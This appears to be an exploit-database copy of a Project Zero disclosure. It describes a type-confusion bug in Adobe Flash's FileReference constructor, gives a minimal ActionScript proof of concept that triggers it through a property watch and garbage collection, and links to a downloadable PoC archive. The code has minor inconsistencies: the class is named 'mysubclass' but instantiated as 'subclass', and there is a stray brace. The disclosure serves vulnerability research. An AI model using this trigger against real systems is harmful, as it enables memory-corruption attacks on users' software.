33 lines
No EOL
1,015 B
Text
33 lines
No EOL
1,015 B
Text
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=799
|
|
|
|
There is a type confusion issue in the FileReference constructor. The constructor adds several properties to the constructed object before setting the type and data. If a watch is set on one of these properties, code can be called and the object can be initialized to one with a destructor before the FileReference constructor sets the object data, leading to type confusion when the object is garbage collected.
|
|
|
|
A minimal PoC is as follows:
|
|
|
|
function myfunc(){
|
|
|
|
this.__proto__ = {};
|
|
this.__proto__.__constructor__ = flash.display.BitmapData;
|
|
super(1000, 1000);
|
|
|
|
|
|
}
|
|
|
|
|
|
function mysubclass(){
|
|
|
|
|
|
this.watch("name", myfunc);
|
|
_global.ASnative(2204, 200)(this); // FileReference constructor
|
|
this.unwatch("name"); // let the reference free
|
|
|
|
}
|
|
}
|
|
|
|
var a = new subclass();
|
|
a = 0;
|
|
// wait for GC
|
|
|
|
|
|
Proof of Concept:
|
|
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39829.zip |